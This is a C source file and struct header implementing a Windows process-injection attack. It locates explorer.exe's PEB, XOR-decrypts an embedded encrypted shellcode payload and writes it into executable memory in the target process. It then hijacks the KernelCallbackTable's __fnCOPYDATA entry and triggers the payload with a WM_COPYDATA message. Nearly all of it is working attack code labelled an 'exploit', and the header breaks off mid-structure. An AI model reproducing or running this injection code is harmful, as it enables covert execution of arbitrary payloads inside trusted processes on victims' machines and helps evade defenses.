#include <stdio.h>
#include <windows.h>
#include "struct.h"
#include "helper.h"
void LoadNtQueryInformationProcess()
{
printf(COLOR_YELLOW_BOLD "[*] Loading NtQueryInformationProcess...\n" COLOR_RESET);
HMODULE hNtdll = GetModuleHandle(L"ntdll.dll");
if (hNtdll)
{
NtQueryInformationProcess = (PFN_NTQUERYINFORMATIONPROCESS)GetProcAddress(hNtdll, "NtQueryInformationProcess");
if (NtQueryInformationProcess)
{
printf(COLOR_GREEN_BOLD "[+] NtQueryInformationProcess loaded successfully at address: 0x%p\n" COLOR_RESET, NtQueryInformationProcess);
}
else
{
printf(COLOR_RED_BOLD "\t[-] Failed to resolve NtQueryInformationProcess address.\n" COLOR_RESET);
}
}
}
void EnableDebugPrivilege()
{
printf(COLOR_YELLOW_BOLD "[*] Enabling Debug Privilege...\n" COLOR_RESET);
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
{
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tkp.Privileges[0].Luid);
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL);
CloseHandle(hToken);
// printf( COLOR_GREEN_BOLD "\t[+] Debug Privilege enabled.\n" COLOR_RESET );
}
else
{
printf(COLOR_RED_BOLD "\t[-] Failed to enable Debug Privilege.\n" COLOR_RESET);
}
}
void xor_decrypt(unsigned char* data, size_t length, const char* key) {
size_t key_len = strlen(key);
for (size_t i = 0; i < length; i++) {
data[i] ^= key[i % key_len]; // XOR each byte with the key (loop over key if necessary)
}
}
unsigned char payload[] = "\x8e\x2d\xee\x8b\x82\x8d\xa5\x6f\x72\x65\x2c\x3e\x33\x35\x3f\x3e\x24\x2d\x5c\xbd\x17\x2d\xe6\x3d\x12\x2d\xe6\x3d\x6a\x2d\xe6\x3d\x52\x2d\xe6\x1d\x22\x2d\x62\xd8\x38\x2f\x20\x5e\xbb\x2d\x5c\xaf\xde\x59\x0c\x13\x70\x49\x4d\x2e\xb3\xac\x60\x2e\x73\xa4\x8f\x82\x20\x24\x3c\x27\xf9\x37\x4d\xe4\x30\x59\x25\x6e\xa2\x03\xec\x17\x6a\x6e\x6f\x1a\x00\xee\xed\xe7\x72\x65\x6d\x27\xf7\xa5\x19\x08\x3a\x64\xbd\x3f\xf9\x2d\x75\x2b\xf9\x25\x4d\x26\x73\xb5\x8e\x39\x3a\x9a\xa4\x2e\xf9\x51\xe5\x27\x73\xb3\x20\x5e\xbb\x2d\x5c\xaf\xde\x24\xac\xa6\x7f\x24\x6c\xae\x4a\x85\x18\x9e\x3e\x66\x21\x4b\x7a\x20\x54\xbe\x07\xbd\x35\x2b\xf9\x25\x49\x26\x73\xb5\x0b\x2e\xf9\x69\x25\x2b\xf9\x25\x71\x26\x73\xb5\x2c\xe4\x76\xed\x25\x6e\xa2\x24\x35\x2e\x2a\x3b\x34\x35\x33\x3d\x2c\x36\x33\x3f\x25\xec\x9e\x45\x2c\x3d\x8d\x85\x35\x2e\x2b\x3f\x25\xe4\x60\x8c\x22\x90\x8d\x9a\x30\x05\x72\x2c\xd3\x18\x1b\x0b\x04\x01\x17\x11\x6d\x2e\x24\x2c\xe4\x89\x3e\xec\x9c\x2e\xc8\x29\x1a\x49\x75\x9a\xb8\x27\x43\xac\x25\x5e\xa0\x28\x5c\xaf\x3f\x54\xa4\x2e\x22\x24\x3d\x2e\xc8\x5f\x3b\x16\xd5\x9a\xb8\x84\x01\x3f\x25\xe6\xb3\x24\xd5\x3f\x72\x65\x6d\x22\x43\xac\x2c\x3e\x33\x34\x07\x6c\x33\x34\x2c\xd5\x25\xec\xf2\xa9\x8d\xb0\x86\x36\x29\x2d\xe4\xae\x3a\x54\xbf\x26\xfb\xbd\x20\x5e\xbb\x37\x05\x6f\x70\x25\xe9\x3d\x20\x24\xd7\x84\x27\x4b\x56\x90\xa7\x2d\xe4\xa9\x3a\xe6\xae\x3f\x18\x6f\x32\x27\xfb\x94\x25\xe6\xa8\x2c\xaa\xaf\x8d\x9a\x92\x90\x3f\x54\xa4\x3d\x20\x24\xd7\x42\x74\x7d\x16\x90\xa7\xe0\xad\x60\xf7\xf8\x6c\x6f\x72\x2d\x92\xa0\x7d\xe1\xe1\x6e\x72\x65\x86\xbc\x9b\x81\x6c\x6f\x72\x8d\xcf\x90\x8d\x9a\x42\x58\x1d\x0f\x20\x6f\xc9\x5e\xdc\x73\x1d\xed\x11\x0c\x3f\xc8\x5b\x06\x77\xbe\x1f\xe5\xee\xc9\x28\x75\x4e\x5a\x79\xa3\xea\xc7\x67\x70\x8e\xef\xd5\xa5\xed\xba\xa4\xb8\xb8\xfe\x2e\x17\x83\x6c\x29\x5b\x5a\xf6\x78\xee\x48\x19\xa7\xca\xf9\xda\xa8\xd2\x43\x7e\x87\x41\x59\xdd\x82\xbc\xa8\xef\x79\x37\x42\xf8\xdb\x70\x8c\x65\x38\x1c\x17\x17\x40\x2e\x15\x00\x03\x1b\x48\x45\x20\x00\x08\x0c\x01\x03\x13\x4a\x58\x41\x42\x45\x45\x38\x1b\x0b\x09\x00\x05\x16\x4d\x21\x26\x45\x5b\x41\x43\x5e\x4d\x38\x1b\x0b\x5b\x5b\x49\x45\x15\x59\x46\x5e\x4d\x1d\x04\x5f\x59\x58\x5c\x55\x44\x4f\x35\x00\x0e\x04\x1d\x4a\x5f\x5f\x43\x55\x5d\x5e\x42\x54\x4d\x29\x1b\x17\x08\x09\x1d\x1d\x42\x5b\x45\x4b\x5d\x62\x78\x65\x63\x89\x63\xef\x7f\x10\xc7\x73\xe8\x92\xb7\x84\xe9\x56\x21\x64\xbe\xcc\xba\x7d\xda\xb7\x2d\x6a\x76\xc9\x82\x6f\xcd\x23\x75\xf2\x7c\x5f\xdf\xc4\x4f\x63\x91\xf3\x23\x31\x39\x53\x01\xad\xf0\x7f\xf6\x1b\xcb\x7f\x3f\xab\xa6\x07\x94\x7c\x3a\xc6\x65\xab\x07\xbf\xfe\xe7\xf0\x50\x67\xba\x38\x35\xc1\x21\xb8\xc9\xde\xc9\xab\x7e\x47\xa7\x13\x18\xd8\x89\x78\x3c\x5e\xbb\x62\x00\x7a\xee\xdb\x80\x6f\x62\x30\xe5\xe7\x27\xd7\x4e\xbe\xe1\x77\xeb\x3e\xb7\x85\xd2\x4a\x8a\xca\xe6\x27\xa7\x99\xfe\x50\xb3\xa7\xa3\xb0\xb9\x94\x94\xcd\x06\xdf\x6c\x3c\x03\xb5\x2f\x20\xaa\x9f\x81\x84\x06\x65\x25\x35\xd7\xf2\xaa\xf9\x4b\x42\x3c\x01\x30\x89\x42\x91\xf8\xba\xd1\x4b\x99\x6c\x32\x16\xce\x09\x07\x8e\xf9\x1e\x85\x2c\xe0\xee\x93\x8a\xc4\xb7\xbc\x69\xc9\x8f\xa6\x4c\x68\xc6\x77\x6b\xe4\x26\x6b\xa8\x68\xe8\x14\xa9\x5b\x8c\x4e\xfa\xd2\x53\x34\xfa\x3e\xb9\x84\x50\x53\xe3\x65\x2c\xd1\x82\xd0\xcf\x39\x8d\xb0\x25\x5e\xbb\xdf\x6d\x6f\x32\x65\x2c\xd7\x72\x75\x6d\x6f\x33\xdc\x2d\x6f\x72\x65\x2c\xd5\x2a\xc1\x3e\x8a\x8d\xb0\x25\xfc\x21\x36\x25\xe6\x95\x2d\xe4\x9e\x3a\xec\xb7\x2e\xca\x65\x4d\x6f\x72\x2c\xe4\x96\x33\xdf\x7f\xf9\xfb\x87\x92\xba\x3a\xe6\xa9\x4f\xf7\xa5\x19\xd9\x14\xee\x6a\x27\x73\xa6\xe8\xaf\x07\xb2\x35\x37\x2a\x2d\x68\x6f\x72\x65\x6d\x3f\xb1\x8d\xf2\x92\x8d\x9a\x5c\x5f\x5c\x55\x43\x5d\x5c\x50\x6d\x55\xac\x0d\xdc";
size_t encrypted_length = sizeof(payload);
const char* key = "remo"; // Key used for XOR encryption
SIZE_T shellcodeSize = sizeof(payload) - 1;
SIZE_T bytesRead = 0;
int main()
{
printf(COLOR_YELLOW_BOLD "[*] Initializing exploit...\n" COLOR_RESET);
EnableDebugPrivilege();
LoadNtQueryInformationProcess();
if (!NtQueryInformationProcess)
{
printf(COLOR_RED_BOLD "\t[-] NtQueryInformationProcess is NULL. Exiting...\n" COLOR_RESET);
return -1;
}
printf(COLOR_YELLOW_BOLD "[*] Starting PEB KernelCallbackTable Injection Exploit...\n\n" COLOR_RESET);
// Step 1: Create a new explorer process (ensure it is visible to the user)
PROCESS_INFORMATION pi = { 0 };
STARTUPINFO si = { sizeof(STARTUPINFO) };
si.dwFlags = STARTF_USESHOWWINDOW;
si.wShowWindow = SW_SHOW;
printf(COLOR_YELLOW_BOLD "\t[*] Creating new explorer process...\n" COLOR_RESET);
if (!CreateProcess(
L"C:\\Windows\\explorer.exe",
NULL,
NULL,
NULL,
FALSE,
CREATE_NEW_CONSOLE,
NULL,
NULL,
&si,
&pi
))
{
printf(COLOR_RED_BOLD "\t[-] Failed to create explorer process. Error: %d\n" COLOR_RESET, GetLastError());
return -1;
}
printf(COLOR_GREEN_BOLD "\t[+] explorer process created successfully. PID: %d\n" COLOR_RESET, pi.dwProcessId);
// Step 2: Wait for the new process to initialize
printf(COLOR_YELLOW_BOLD "\t[*] Waiting for explorer initialization...\n" COLOR_RESET);
WaitForInputIdle(pi.hProcess, 1000);
// Step 3: Find the explorer window handle
HWND hWindow = NULL;
DWORD waitTime = 0;
while (hWindow == NULL && waitTime < MAX_WAIT_TIME)
{
hWindow = FindWindow(L"Explorer", NULL);
if (!hWindow)
{
Sleep(500); // Wait for 500 ms before retrying
waitTime += 500;
}
}
if (!hWindow)
{
printf(COLOR_RED_BOLD "\t[-] Failed to find explorer window handle after waiting for %d milliseconds.\n" COLOR_RESET, MAX_WAIT_TIME);
TerminateProcess(pi.hProcess, 0);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return -1;
}
printf(COLOR_GREEN_BOLD "\t[+] Window Handle found: 0x%p\n" COLOR_RESET, hWindow);
// Step 4: Get the process ID of the explorer
DWORD pid;
GetWindowThreadProcessId(hWindow, &pid);
printf(COLOR_GREEN_BOLD "\t[+] Process ID: %d\n" COLOR_RESET, pid);
HANDLE hProcess = OpenProcess(
PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION,
FALSE,
pid
);
if (!hProcess)
{
printf(COLOR_RED_BOLD "\t[-] Failed to open target process. Error: %d\n" COLOR_RESET, GetLastError());
return -1;
}
printf(COLOR_GREEN_BOLD "\t[+] Process Handle: 0x%p\n" COLOR_RESET, hProcess);
// -----------------------------------------------------
// Using NtQueryInformationProcess to get PEB
// -----------------------------------------------------
printf(COLOR_YELLOW_BOLD "\t[*] Retrieving PEB Address using NtQueryInformationProcess...\n" COLOR_RESET);
PROCESS_BASIC_INFORMATION pbi;
ULONG returnLength;
NTSTATUS status = NtQueryInformationProcess(
hProcess,
ProcessBasicInformation,
&pbi,
sizeof(pbi),
&returnLength
);
if (status != 0)
{
printf(COLOR_RED_BOLD "\t[-] Failed to query process information. NTSTATUS: 0x%lx\n" COLOR_RESET, status);
return -1;
}
PVOID PebBaseAddress = pbi.PebBaseAddress;
printf(COLOR_BLUE_BOLD "\t\t[*] PEB Address: 0x%p\n" COLOR_RESET, PebBaseAddress);
// Step 6: Read KernelCallbackTable from the target process's PEB
PVOID KernelCallbackTable;
SIZE_T bytesRead = 0;
if (!ReadProcessMemory(
hProcess,
(PBYTE)PebBaseAddress + offsetof(PEB, KernelCallbackTable),
&KernelCallbackTable,
sizeof(PVOID),
&bytesRead
))
{
printf(COLOR_RED_BOLD "\t[-] Failed to read KernelCallbackTable. Error: %d\n" COLOR_RESET, GetLastError());
return -1;
}
printf(COLOR_BLUE_BOLD "\t\t[*] KernelCallbackTable Address: 0x%p\n" COLOR_RESET, KernelCallbackTable);
// Step 7: Read KernelCallbackTable structure from the target process
KERNELCALLBACKTABLE CCC;
if (!ReadProcessMemory(
hProcess,
KernelCallbackTable,
&CCC,
sizeof(CCC),
&bytesRead
))
{
printf(COLOR_RED_BOLD "\t[-] Failed to read KernelCallbackTable structure. Error: %d\n" COLOR_RESET, GetLastError());
return -1;
}
printf(COLOR_GREEN_BOLD "\n\t[+] KernelCallbackTable read successfully. %zu bytes read.\n" COLOR_RESET, bytesRead);
printf(COLOR_BLUE_BOLD "\t\t[*] Dumping KernelCallbackTable structure:\n" COLOR_RESET);
printf(COLOR_GREEN_BOLD "\t\t\t__fnCOPYDATA: 0x%p\n" COLOR_RESET, (void*)CCC.__fnCOPYDATA);
printf(COLOR_GREEN_BOLD "\t\t\t__fnCOPYGLOBALDATA: 0x%p\n" COLOR_RESET, (void*)CCC.__fnCOPYGLOBALDATA);
printf(COLOR_GREEN_BOLD "\t\t\t__fnDWORD: 0x%p\n" COLOR_RESET, (void*)CCC.__fnDWORD);
// -----------------------------------------------------
// Assembly Method: Using LocatePEB and ResolveKernelCallbackTable
// -----------------------------------------------------
/*
//
printf( COLOR_YELLOW_BOLD "\t[*] Retrieving PEB Address using Assembly...\n" COLOR_RESET );
PVOID PebBaseAddressASM = LocatePEB();
printf( COLOR_BLUE_BOLD "\t\t[*] PEB Address (from ASM): 0x%p\n" COLOR_RESET, PebBaseAddressASM );
printf( COLOR_YELLOW_BOLD "\t[*] Resolving KernelCallbackTable using Assembly...\n" COLOR_RESET );
PVOID KernelCallbackTableASM = ResolveKernelCallbackTable( PebBaseAddressASM );
printf( COLOR_BLUE_BOLD "\t\t[*] KernelCallbackTable Address (from ASM): 0x%p\n" COLOR_RESET, KernelCallbackTableASM );
// Continue using KernelCallbackTableASM as needed
*/
// Step 8: Write payload to remote buffer
printf(COLOR_YELLOW_BOLD "\n\t[*] Allocating remote buffer for payload...\n" COLOR_RESET);
LPVOID remotebuf = VirtualAllocEx(
hProcess,
NULL,
shellcodeSize,
MEM_RESERVE | MEM_COMMIT,
PAGE_EXECUTE_READWRITE
);
xor_decrypt(payload, encrypted_length, key);
if (!remotebuf)
{
printf(COLOR_RED_BOLD "\t[-] Failed to allocate remote buffer. Error: %d\n" COLOR_RESET, GetLastError());
return -1;
}
if (!WriteProcessMemory(
hProcess,
remotebuf,
payload,
shellcodeSize,
NULL
))
{
printf(COLOR_RED_BOLD "\t[-] Failed to write payload to remote buffer. Error: %d\n" COLOR_RESET, GetLastError());
return -1;
}
printf(COLOR_GREEN_BOLD "\t[+] Payload written to remote buffer at: 0x%p\n" COLOR_RESET, remotebuf);
// Step 9: Modify __fnCOPYDATA in the KernelCallbackTable
printf(COLOR_YELLOW_BOLD "\t[*] Modifying __fnCOPYDATA to point to payload...\n" COLOR_RESET);
CCC.__fnCOPYDATA = (ULONG_PTR)remotebuf;
printf(COLOR_BLUE_BOLD "\t\t[*] __fnCOPYDATA now points to: 0x%p\n" COLOR_RESET, remotebuf);
// Step 10: Clone modified KernelCallbackTable
printf(COLOR_YELLOW_BOLD "\n\t[*] Cloning modified KernelCallbackTable...\n" COLOR_RESET);
LPVOID cloneCCC = VirtualAllocEx(
hProcess,
NULL,
sizeof(CCC),
MEM_RESERVE | MEM_COMMIT,
PAGE_READWRITE
);
if (!cloneCCC)
{
printf(COLOR_RED_BOLD "\t[-] Failed to allocate memory for cloned KernelCallbackTable. Error: %d\n" COLOR_RESET, GetLastError());
return -1;
}
if (!WriteProcessMemory(
hProcess,
cloneCCC,
&CCC,
sizeof(CCC),
NULL
))
{
printf(COLOR_RED_BOLD "\t[-] Failed to write cloned KernelCallbackTable. Error: %d\n" COLOR_RESET, GetLastError());
return -1;
}
printf(COLOR_GREEN_BOLD "\t[+] Cloned KernelCallbackTable written at: 0x%p\n" COLOR_RESET, cloneCCC);
// Step 11: Update PEB KernelCallbackTable to cloned KernelCallbackTable
printf(COLOR_YELLOW_BOLD "\t[*] Updating PEB with cloned KernelCallbackTable...\n" COLOR_RESET);
if (!WriteProcessMemory(
hProcess,
(PBYTE)PebBaseAddress + offsetof(PEB, KernelCallbackTable),
&cloneCCC,
sizeof(PVOID),
&bytesRead
))
{
printf(COLOR_RED_BOLD "\t[-] Failed to update PEB KernelCallbackTable. Error: %d\n" COLOR_RESET, GetLastError());
return -1;
}
printf(COLOR_GREEN_BOLD "\t[+] PEB KernelCallbackTable updated successfully!\n" COLOR_RESET);
// Step 12: Ensure Memory Protection for Payload
DWORD oldProtect;
if (!VirtualProtectEx(
hProcess,
remotebuf,
shellcodeSize,
PAGE_EXECUTE_READ,
&oldProtect
))
{
printf(COLOR_RED_BOLD "\t[-] Failed to change memory protection for payload. Error: %d\n" COLOR_RESET, GetLastError());
return -1;
}
printf(COLOR_GREEN_BOLD "\t[+] Memory protection for payload set to PAGE_EXECUTE_READ.\n" COLOR_RESET);
// Step 13: Trigger the payload
printf(COLOR_YELLOW_BOLD "\t[*] Sending message to trigger the payload...\n" COLOR_RESET);
COPYDATASTRUCT cds;
WCHAR msg[] = L"LJX";
cds.dwData = 1;
cds.cbData = (lstrlenW(msg) + 1) * sizeof(WCHAR);
cds.lpData = msg;
LRESULT result = SendMessage(
hWindow,
WM_COPYDATA,
(WPARAM)hWindow,
(LPARAM)&cds
);
if (result == 0 && GetLastError() != 0)
{
printf(COLOR_RED_BOLD "\t[-] Failed to send message to trigger payload. Error: %d\n" COLOR_RESET, GetLastError());
return -1;
}
printf(COLOR_GREEN_BOLD "\t[+] Payload triggered!\n" COLOR_RESET);
// Cleanup
printf(COLOR_YELLOW_BOLD "\t[*] Cleaning up...\n" COLOR_RESET);
VirtualFreeEx(hProcess, remotebuf, 0, MEM_RELEASE);
VirtualFreeEx(hProcess, cloneCCC, 0, MEM_RELEASE);
TerminateProcess(pi.hProcess, 0);
CloseHandle(hProcess);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
printf(COLOR_GREEN_BOLD "\n[+] YAAAAAAAAAY.\n" COLOR_RESET);
printf(COLOR_GREEN_BOLD "[+] Exploit completed successfully.\n" COLOR_RESET);
return 0;
}
#pragma once
#include <Windows.h>
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING;
typedef struct _KERNELCALLBACKTABLE_T {
ULONG_PTR __fnCOPYDATA;
ULONG_PTR __fnCOPYGLOBALDATA;
ULONG_PTR __fnDWORD;
ULONG_PTR __fnNCDESTROY;
ULONG_PTR __fnDWORDOPTINLPMSG;
ULONG_PTR __fnINOUTDRAG;
ULONG_PTR __fnGETTEXTLENGTHS;
ULONG_PTR __fnINCNTOUTSTRING;
ULONG_PTR __fnPOUTLPINT;
ULONG_PTR __fnINLPCOMPAREITEMSTRUCT;
ULONG_PTR __fnINLPCREATESTRUCT;
ULONG_PTR __fnINLPDELETEITEMSTRUCT;
ULONG_PTR __fnINLPDRAWITEMSTRUCT;
ULONG_PTR __fnPOPTINLPUINT;
ULONG_PTR __fnPOPTINLPUINT2;
ULONG_PTR __fnINLPMDICREATESTRUCT;
ULONG_PTR __fnINOUTLPMEASUREITEMSTRUCT;
ULONG_PTR __fnINLPWINDOWPOS;
ULONG_PTR __fnINOUTLPPOINT5;
ULONG_PTR __fnINOUTLPSCROLLINFO;
ULONG_PTR __fnINOUTLPRECT;
ULONG_PTR __fnINOUTNCCALCSIZE;
ULONG_PTR __fnINOUTLPPOINT5_;
ULONG_PTR __fnINPAINTCLIPBRD;
ULONG_PTR __fnINSIZECLIPBRD;
ULONG_PTR __fnINDESTROYCLIPBRD;
ULONG_PTR __fnINSTRING;
ULONG_PTR __fnINSTRINGNULL;
ULONG_PTR __fnINDEVICECHANGE;
ULONG_PTR __fnPOWERBROADCAST;
ULONG_PTR __fnINLPUAHDRAWMENU;
ULONG_PTR __fnOPTOUTLPDWORDOPTOUTLPDWORD;
ULONG_PTR __fnOPTOUTLPDWORDOPTOUTLPDWORD_;
ULONG_PTR __fnOUTDWORDINDWORD;
ULONG_PTR __fnOUTLPRECT;
ULONG_PTR __fnOUTSTRING;
ULONG_PTR __fnPOPTINLPUINT3;
ULONG_PTR __fnPOUTLPINT2;
ULONG_PTR __fnSENTDDEMSG;
ULONG_PTR __fnINOUTSTYLECHANGE;
ULONG_PTR __fnHkINDWORD;
ULONG_PTR __fnHkINLPCBTACTIVATESTRUCT;
ULONG_PTR __fnHkINLPCBTCREATESTRUCT;
ULONG_PTR __fnHkINLPDEBUGHOOKSTRUCT;
ULONG_PTR __fnHkINLPMOUSEHOOKSTRUCTEX;
ULONG_PTR __fnHkINLPKBDLLHOOKSTRUCT;
ULONG_PTR __fnHkINLPMSLLHOOKSTRUCT;
ULONG_PTR __fnHkINLPMSG;
ULONG_PTR __fnHkINLPRECT;
ULONG_PTR __fnHkOPTINLPEVENTMSG;
ULONG_PTR __xxxClientCallDelegateThread;
ULONG_PTR __ClientCallDummyCallback;
ULONG_PTR __fnKEYBOARDCORRECTIONCALLOUT;
ULONG_PTR __fnOUTLPCOMBOBOXINFO;
ULONG_PTR __fnINLPCOMPAREITEMSTRUCT2;
ULONG_PTR __xxxClientCallDevCallbackCapture;
ULONG_PTR __xxxClientCallDitThread;
ULONG_PTR __xxxClientEnableMMCSS;
ULONG_PTR __xxxClientUpdateDpi;
ULONG_PTR __xxxClientExpandStringW;
ULONG_PTR __ClientCopyDDEIn1;
ULONG_PTR __ClientCopyDDEIn2;
ULONG_PTR __ClientCopyDDEOut1;
ULONG_PTR __ClientCopyDDEOut2;
ULONG_PTR __ClientCopyImage;
ULONG_PTR __ClientEventCallback;
ULONG_PTR __ClientFindMnemChar;
ULONG_PTR __ClientFreeDDEHandle;
ULONG_PTR __ClientFreeLibrary;
ULONG_PTR __ClientGetCharsetInfo;
ULONG_PTR __ClientGetDDEFlags;
ULONG_PTR __ClientGetDDEHookData;
ULONG_PTR __ClientGetListboxString;
ULONG_PTR __ClientGetMessageMPH;
ULONG_PTR __ClientLoadImage;
ULONG_PTR __ClientLoadLibrary;
ULONG_PTR __ClientLoadMenu;
ULONG_PTR __ClientLoadLocalT1Fonts;
ULONG_PTR __ClientPSMTextOut;
ULONG_PTR __ClientLpkDrawTextEx;
ULONG_PTR __ClientExtTextOutW;
ULONG_PTR __ClientGetTextExtentPointW;
ULONG_PTR __ClientCharToWchar;
ULONG_PTR __ClientAddFontResourceW;
ULONG_PTR __ClientThreadSetup;
ULONG_PTR __ClientDeliverUserApc;
ULONG_PTR __ClientNoMemoryPopup;
ULONG_PTR __ClientMonitorEnumProc;
ULONG_PTR __ClientCallWinEventProc;
ULONG_PTR __ClientWaitMessageExMPH;
ULONG_PTR __ClientWOWGetProcModule;
ULONG_PTR __ClientWOWTask16SchedNotify;
ULONG_PTR __ClientImmLoadLayout;
ULONG_PTR __ClientImmProcessKey;
ULONG_PTR __fnIMECONTROL;
ULONG_PTR __fnINWPARAMDBCSCHAR;
ULONG_PTR __fnGETTEXTLENGTHS2;
ULONG_PTR __fnINLPKDRAWSWITCHWND;
ULONG_PTR __ClientLoadStringW;
ULONG_PTR __ClientLoadOLE;
ULONG_PTR __ClientRegisterDragDrop;
ULONG_PTR __ClientRevokeDragDrop;
ULONG_PTR __fnINOUTMENUGETOBJECT;
ULONG_PTR __ClientPrinterThunk;
ULONG_PTR __fnOUTLPCOMBOBOXINFO2;
ULONG_PTR __fnOUTLPSCROLLBARINFO;
ULONG_PTR __fnINLPUAHDRAWMENU2;
ULONG_PTR __fnINLPUAHDRAWMENUITEM;
ULONG_PTR __fnINLPUAHDRAWMENU3;
ULONG_PTR __fnINOUTLPUAHMEASUREMENUITEM;
ULONG_PTR __fnINLPUAHDRAWMENU4;
ULONG_PTR __fnOUTLPTITLEBARINFOEX;
ULONG_PTR __fnTOUCH;
ULONG_PTR __fnGESTURE;
ULONG_PTR __fnPOPTINLPUINT4;
ULONG_PTR __fnPOPTINLPUINT5;
ULONG_PTR __xxxClientCallDefaultInputHandler;
ULONG_PTR __fnEMPTY;
ULONG_PTR __ClientRimDevCallback;
ULONG_PTR __xxxClientCallMinTouchHitTestingCallback;
ULONG_PTR __ClientCallLocalMouseHooks;
ULONG_PTR __xxxClientBroadcastThemeChange;
ULONG_PTR __xxxClientCallDevCallbackSimple;
ULONG_PTR __xxxClientAllocWindowClassExtraBytes;
ULONG_PTR __xxxClientFreeWindowClassExtraBytes;
ULONG_PTR __fnGETWINDOWDATA;
ULONG_PTR __fnINOUTSTYLECHANGE2;
ULONG_PTR __fnHkINLPMOUSEHOOKSTRUCTEX2;
} KERNELCALLBACKTABLE;
typedef struct _PEB
{
UCHAR InheritedAddressSpace; //0x0
UCHAR ReadImageFileExecOptions; //0x1
UCHAR BeingDebugged; //0x2
union
{
UCHAR BitField; //0x3
struct
{
UCHAR ImageUsesLargePages : 1; //0x3
UCHAR IsProtectedProcess : 1; //0x3
UCHAR IsImageDynamicallyRelocated : 1; //0x3
UCHAR SkipPatchingUser32Forwarders : 1; //0x3
UCHAR IsPackagedProcess : 1; //0x3
UCHAR IsAppContainer : 1; //0x3
UCHAR IsProtectedProcessLight : 1; //0x3
UCHAR IsLongPathAwareProcess : 1; //0x3
};
};
UCHAR Padding0[4]; //0x4
VOID* Mutant; //0x8
VOID* ImageBaseAddress; //0x10
struct _PEB_LDR_DATA* Ldr; //0x18
struct _RTL_USER_PROCESS_PARAMETERS* ProcessParameters; //0x20
VOID* SubSystemData; //0x28
VOID* ProcessHeap; //0x30
struct _RTL_CRITICAL_SECTION* FastPebLock; //0x38
union _SLIST_HEADER* volatile AtlThunkSListPtr; //0x40
VOID* IFEOKey; //0x48
union
{
ULONG CrossProcessFlags; //0x50
struct
{
ULONG ProcessInJob : 1; //0x50
ULONG ProcessInitializing : 1; //0x50
ULONG ProcessUsingVEH : 1; //0x50
ULONG ProcessUsingVCH : 1; //0x50
ULONG ProcessUsingFTH : 1; //0x50
ULONG ProcessPreviouslyThrottled : 1; //0x50
ULONG ProcessCurrentlyThrottled : 1; //0x50
ULONG ProcessImagesHotPatched : 1; //0x50
ULONG ReservedBits0 : 24; //0x50
};
};
UCHAR Padding1[4]; //0x54
union
{
VOID* KernelCallbackTable; //0x58
VOID* UserSharedInfoPtr; //0x58
};
ULONG SystemReserved; //0x60
ULONG AtlThunkSListPtr32; //0x64
VOID* ApiSetMap; //0x68
ULONG TlsExpansionCounter; //0x70
UCHAR Padding2[4]; //0x74
VOID* TlsBitmap; //0x78
ULONG TlsBitmapBits[2]; //0x80
VOID* ReadOnlySharedMemoryBase; //0x88
VOID* SharedData; //0x90
VOID** ReadOnlyStaticServerData; //0x98
VOID* AnsiCodePageData; //0xa0
VOID* OemCodePageData; //0xa8
VOID* UnicodeCaseTableData; //0xb0
ULONG NumberOfProcessors; //0xb8
ULONG NtGlobalFlag; //0xbc
union _LARGE_INTEGER CriticalSectionTimeout; //0xc0
ULONGLONG HeapSegmentReserve; //0xc8
ULONGLONG HeapSegmentCommit; //0xd0
ULONGLONG HeapDeCommitTotalFreeThreshold; //0xd8
ULONGLONG HeapDeCommitFreeBlockThreshold; //0xe0
ULONG NumberOfHeaps; //0xe8
ULONG MaximumNumberOfHeaps; //0xec
VOID** ProcessHeaps; //0xf0
VOID* GdiSharedHandleTable; //0xf8
VOID* ProcessStarterHelper; //0x100
ULONG GdiDCAttributeList; //0x108
UCHAR Padding3[4]; //0x10c
struct _RTL_CRITICAL_SECTION* LoaderLock; //0x110
ULONG OSMajorVersion; //0x118
ULONG OSMinorVersion; //0x11c
USHORT OSBuildNumber; //0x120
USHORT OSCSDVersion; //0x122
ULONG OSPlatformId; //0x124
ULONG ImageSubsystem; //0x128
ULONG ImageSubsystemMajorVersion; //0x12c
ULONG ImageSubsystemMinorVersion; //0x130
UCHAR Padding4[4]; //0x134
ULONGLONG ActiveProcessAffinityMask; //0x138
ULONG GdiHandleBuffer[60]; //0x140
VOID(*PostProcessInitRoutine)(); //0x230
VOID* TlsExpansionBitmap; //0x238
ULONG TlsExpansionBitmapBits[32]; //0x240
ULONG SessionId; //0x2c0
UCHAR Padding5[4]; //0x2c4
union _ULARGE_INTEGER AppCompatFlags; //0x2c8
union _ULARGE_INTEGER AppCompatFlagsUser; //0x2d0
VOID* pShimData; //0x2d8
VOID* AppCompatInfo; //0x2e0
struct _UNICODE_STRING CSDVersion; //0x2e8
struct _ACTIVATION_CONTEXT_DATA* ActivationContextData; //0x2f8
struct _ASSEMBLY_STORAGE_MAP* ProcessAssemblyStorageMap; //0x300
struct _ACTIVATION_CONTEXT_DATA* SystemDefaultActivationContextData; //0x308
struct _ASSEMBLY_STORAGE_MAP* SystemAssemblyStorageMap; //0x310
ULONGLONG MinimumStackCommit; //0x318
struct _FLS_CALLBACK_INFO* FlsCallback; //0x320
struct _LIST_ENTRY FlsListHead; //0x328
VOID* FlsBitmap; //0x338
ULONG FlsBitmapBits[4]; //0x340
ULONG FlsHighIndex; //0x350
VOID* WerRegistrationData; //0x358
VOID* WerShipAssertPtr; //0x360
VOID* pUnused; //0x368
VOID* pImageHeaderHash; //0x370
union
{
ULONG TracingFlags; //0x378
struct
{
ULONG HeapTracingEnabled : 1; //0x378
ULONG CritSecTracingEnabled : 1; //0x378
ULONG LibLoaderTracingEnabled : 1; //0x378
ULONG SpareTracingBits : 29; //0x378
};
};
UCHAR Padding6[4]; //0x37c
ULONGLONG CsrServerReadOnlySharedMemoryBase; //0x380
ULONGLONG TppWorkerpListLock; //0x388
struct _LIST_ENTRY TppWorkerpList; //0x390
VOID* WaitOnAddressHashTable[128]; //0x3a0
VOID* TelemetryCoverageHeader; //0x7a0
ULONG CloudFileFlags; //0x7a8
